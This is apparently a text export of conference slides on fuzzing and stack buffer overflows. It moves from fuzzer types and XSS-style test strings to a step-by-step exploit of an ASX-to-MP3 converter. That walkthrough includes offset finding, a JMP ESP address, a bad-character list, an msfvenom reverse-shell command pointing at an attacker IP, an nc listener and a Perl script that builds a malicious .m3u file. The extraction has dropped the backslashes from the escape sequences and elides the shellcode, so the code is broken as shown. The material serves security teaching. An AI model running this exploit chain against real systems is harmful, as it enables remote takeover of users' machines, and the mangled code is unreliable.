The document discusses fuzzing techniques to find vulnerabilities in software. It covers different types of fuzzing targets like protocols, applications, and file formats. It also discusses different types of fuzzing attacks and fuzzers. The document provides an example of a buffer overflow vulnerability and demonstrates how to discover an input format vulnerability using a POP3 protocol. It walks through the steps to develop an exploit, including finding bad characters, locating offsets, and generating shellcode to achieve remote code execution.

1. Fuzzing
Finding Your Own Bugs and 0days!

2. • Penetration Tester
• Instructor I.T
• Consultant of I.S - 10 years
• EC-C|EH
• Author Hakin9 Magazine: Stack Overflow; Pentest Magazine: Covert Channel;
Pentest Magazine: From Fuzzing to Get a Shell
$Whoami
Rodolpho Concurde (ROd0X)
• Speaker at: Hack In The Box - 2020 UAE

3. Agenda
Fuzzing
●
Types of targets;
●
Types of attacks;
●
Types of fuzzers;
●
Buffer overflow;
●
P0C!!

4. Types of targets
- Protocol: FTP, POP3, SMTP, Telnet, anyone!
- Application: Any INPUT of any application.
- File format: Any file Format (.mp3, .m3u, mp4, …) for test the
software’s reader!

5. Types of Attacks
Fuzzers would try combinations of attacks on:
- numbers
- chars
- metadata
- pure binary sequences
Is sent for the target one list with sequence of dangerous string.
Example: (-999999999, alert`1`, top["al"+"ert"](1),
<a href="data:text/html;base64_,<svg/onload=u0061&#x6C;
&#101%72t(1)>">X</a, 11000001000010010001100).

6. Types of Fuzzers -
Caracteristics
●
Dumb: any string combination;
●
Smart fuzzing:
Smart fuzzers are programmed with knowledge of the input format, i.e. a
protocol definition or rules for a file format.
- Mutation
-- Through replay and MITM or Proxy
- Generation
- Evolutionary
Ref: https://www.f-secure.com/en/consulting/our-thinking/15-minute-guide-to-fuzzing

7. Buffer overflow
Buffer overflow is an anomaly where a program, while writing
data to a buffer, overruns the buffer's boundary and overwrites
adjacent memory locations.
Might be:
Heap based: place in the memory which allocate lot amount of
data and, dynamically;
Stack based: Allocate a limited or fixed size of data, such as,
data from local variables or functions.

8. B.0 Code Example
int main(int argc, char *argv[])
{
// Reserve 5 byte of buffer plus the terminating NULL.
// To overflow, need more than 5 bytes...
char buffer[5]; // If more than 5 characters input
// by user, there will be access
// violation, segmentation fault
// a prompt how to execute the program...
if (argc < 2)
{
printf("strcpy() NOT executed....n");
printf("Syntax: %s <characters>n", argv[0]);
exit(0);
}
……………………...

10. P0C
Discovery INPUT format to realize the fuzz.
Example of the protocol POP3 - https://tools.ietf.org/rfc/rfc1081.txt

11. P0C
Vulnerable software to download:
https://www.exploit-db.com/apps/02fffa94e55f73bb2e467810fcad09f7-yahoopops-win-0.6.exe

12. P0C

13. P0C
Vul software to File Format Fuzzing!
http://s2.download.net.pl/ASX-to-MP3-Converter-4063-6400-5319.exe
Opening in Immunityy Debugger the software in:
File -> Attach -> ASX2MP3Converter and Run the same with F9

14. P0C
Image demonstrated below, show the code used to fuzzing the vulnerable software.
Sending to the INPUT of the software the String reached in variable [$buffer].
The value of variable [$buffer] can be generated utilizing the tool of Metasploit
pattern_create.

15. P0C
Compiling the code with the command [perl asx2mp3.pl]
After, load the file p0c.m3u in vul software, run the same in Immunity Debugger.
And we have a Stack Overflow!

16. P0C
The next step is utilize the pattern_offset to localize the Offset of EIP.

17. P0C
In Debugger, we make use of mona.py for see the modules utilized by the vulnerable
software. We need to find a address that make a JUMP from EIP to ESP, for in ESP we put
our shellcode.
Let’s search some module that make JUMP ESP, first let’s see the modules.
For this we will use the mona.py script:
https://raw.githubusercontent.com/corelan/mona/master/mona.py
You should make download of mona.py and paste at:
c:Program FilesImmunity IncImmunity DebuggerPyCommands
Let’s use the mona! Type in command bar of Immunity: !mona modules
We should find a module without mechanisms of protection.

18. P0C
Next step is find inside of msvos module, some expression that make a Jump to the ESP
Register; for this, first we should obtain the assembly value referent the JMP ESP.
Now, the mona command to find this expression.

19. P0C
From this command is find the address 0x01ba135b, and it we should insert in following
exploit code.

20. Now we need to search for bad characters, depending on the application, type of
vulnerability and protocols in use, may be certain characters which are considered "bad"
and should not be used in your buffer or shellcode.
One example of bad characters is 0x00.
This character is considered bad because a null byte is also used to terminate a string copy
operation, which would truncate our buffer whenever which the null byte appears.
For test if has more badchars in the software, close the software and the Immunity, and
reopen the Immunity and attach the software in the Immunity again.
P0C

21. P0C
We will send the string bellow inside of our exploit code.
"x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10"
"x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20"
"x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30"
"x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40"
"x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50"
"x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60"
"x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70"
"x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80"
"x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90"
"x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0"
"xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0"
"xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0"
"xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0"
"xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0"
"xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0"
"xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff"

22. P0C
Sending badchars against the target!

23. P0C
In Immunity, give a click with right-button in ESP and click in Follow in Dump.

24. P0C
Dump of memory with badchars.

25. P0C
The character 0x00 and 0x0a we won’t send, because we already know that it is a
badchars and, for this, generate error in the software.
Our exploit code is like image below! We add variable badchars.

26. P0C
Dump of memory without badchar x0a.

27. Setted a Breakpoint in EIP address with a double-click we see the flow of execution stop in
the address chosen.
For last, let’s generate our shellcode with the msfvenom tool and introduce it in exploit
code.
P0C

29. Load the new malicious file inside ASX2MP3.
P0C

30. nc –lvvp 5555 - > to listen in a TCP port 5555
And we got a shell :)

31. #!/usr/bin/perl
my $buffsize = 50000;
my $junk = "x41" x 35056;
my $eip = "x5bx13xbax01";
my $nops = "x90" x 10;
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.43.114 LPORT=5555 -f perl
-e x86/shikata_ga_nai -b "x0ax00"
my $shell = "xdaxc2xf2xe7x42xdaxccxd9x74x24xf4x58x33xc9" .
"xb1x52x31x70x12x83xc0x04x03xb2xfcx05xb7xce" .
…. Shelllcode …. .
"x38xa2x9exb7x3dxeex18x24x4cx7fxcdx4axe3x80" .
"xba";
my $sploit = $junk.$eip.$nops.$shell;
my $fill = "x43" x ($buffsize - (length($sploit)));
my $buffer = $sploit.$fill;
# write the exploit buffer to file
my $file = "p0c.m3u";
open (FILE, ">$file");
print FILE $buffer;
close(FILE);
print "Exploit file created [" . $file . "]n";
print "Buffer size: ". length($buffer) . "n";
Exploit Code

32. Questions??

33. Thanks!
Rodolpho Concurde
rconcurde@gmail.com
https://www.linkedin.com/in/rodolphoconcurde